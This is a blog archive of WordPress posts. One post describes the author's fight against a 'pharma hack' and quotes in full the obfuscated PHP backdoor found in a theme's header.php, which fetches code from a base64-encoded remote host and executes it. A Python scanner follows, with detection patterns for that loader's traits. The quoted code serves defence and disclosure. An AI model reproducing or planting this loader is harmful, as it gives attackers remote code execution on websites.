How To Use Vagrant And Git To Develop A WordPress Theme

 

Sometimes I like to sit down and play with technology. My colleague Mike Shroder mentioned VVV a few weeks ago and I had to try it. Check out this tutorial I wrote on how to create a new WordPress site, use Vagrant and git to develop a new theme locally, then push the modifications to a live site running on DreamHost (but it could run anywhere else, really).

Source: How To Use Vagrant And Git To Develop A WordPress Theme

Getting busy on the blog for the wrong reasons

I’ve been spending lots of time on this blog but not for good reasons. I’m currently under attack by the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my WordPress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use. I changed the FTP password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.

UPDATE: I think I found the backdoor that the bastard is using. It was in the header.php of one of the templates:

<?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,’$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url[“scheme”]) || !in_array($_url[“scheme”],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url[“host”],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0rnHost: “.$_url[“host”].”rnConnection: Closernrn”; @fwrite($f,$s); $txt=””; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”rnrn”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=””; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”” && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess[‘uptime’]!=””){ unset($sess_f); $sess_f=create_function(“$a”,$sess[‘uptime’]); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>

Let’s see how long this lasts.
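The traits visible in the header.php snippet quoted above (silenced errors, create_function, base64_decode, unserialize, a /tmp/sess_ cache file, remote fetch calls, everything on one very long line) can be checked for across all theme files. The following scanner is an added example, not code from the original post; the indicator names, the threshold of three and the two sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Traits taken from the header.php sample quoted in the post above.
INDICATORS = {
    "dynamic_code": re.compile(r"\bcreate_function\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "errors_silenced": re.compile(r"\berror_reporting\s*\(\s*0\s*\)", re.I),
    "remote_fetch": re.compile(r"\b(curl_init|fsockopen)\s*\(|allow_url_fopen", re.I),
    "tmp_session_file": re.compile(r"/tmp/sess_", re.I),
    "unserialize": re.compile(r"\bunserialize\s*\(", re.I),
}
LONG_LINE = 1000  # injected code usually sits on one very long line
THRESHOLD = 3     # assumption: three co-occurring traits warrant manual review


def scan_php(text):
    """Return the sorted names of the indicators present in one PHP source."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if any(len(line) > LONG_LINE for line in text.splitlines()):
        hits.add("long_line")
    return sorted(hits)


def scan_tree(root):
    """Map each .php file under root that reaches THRESHOLD to its indicators."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if len(hits) >= THRESHOLD:
            report[str(path)] = hits
    return report


# Constructed samples (inert fragments, not working code).
CLEAN = '<?php wp_head(); ?>\n<title><?php bloginfo("name"); ?></title>\n'
INJECTED = ('<?php $er=error_reporting(0); $f=create_function("$u","/*...*/"); '
            '$s=@file_get_contents("/tmp/sess_".md5($id)); '
            '$s=@unserialize(@base64_decode($s)); error_reporting($er); ?>\n') + CLEAN

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, hits in scan_tree(root).items():
        print(name, ", ".join(hits))
```

Run it against wp-content/themes after each file-change notification; a hit is a prompt to read the file, not proof of compromise, since legitimate plugins also use some of these functions.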

Upgraded wordpress, closing the week

This WordPress needed some maintenance, but this time instead of upgrading ‘manually’ I decided to use the WordPress Automatic Upgrade Plugin: boy, it was fast and simple. It seems to be working fine. If you spot any glitches let me know. Now for me it’s time to go play with the RC minihelicopter and away from computers.

Tomorrow I’ll meet Hal in person for the first time at Malpensa while he is flying to Barcelona for the MWC: I’ll take pictures 🙂

Small changes to the blog

I started using the new tag system offered by WordPress 2.3.1 a few weeks ago and I’ve also stopped using the categories. I left them on because I didn’t want to change the archives. I’m still looking for a way to deal with dual language posts: WordPress doesn’t seem to natively support multiple languages (we talked at the Cena Lunga about this with Giacomo and LK). I thought of using different categories, it and eng, but I’m not sure how to achieve separate feeds. Gengo seems too complicated and doesn’t work on 2.3.1 anyway, other solutions I found seem abandoned. Does anybody know of a *stable* solution to mark posts as Italian or English, offering two separate feeds?

While I was playing with WP I’ve added two new widgets: one from Twitter (more freaky experimenting with social networks) and the new FSF fundraising widget. Put it on your blog too and give yourself a nice Christmas present donating to FSF. Did you know they also have a fund to support the defense of poor moms and kids against the RIAA lawsuits?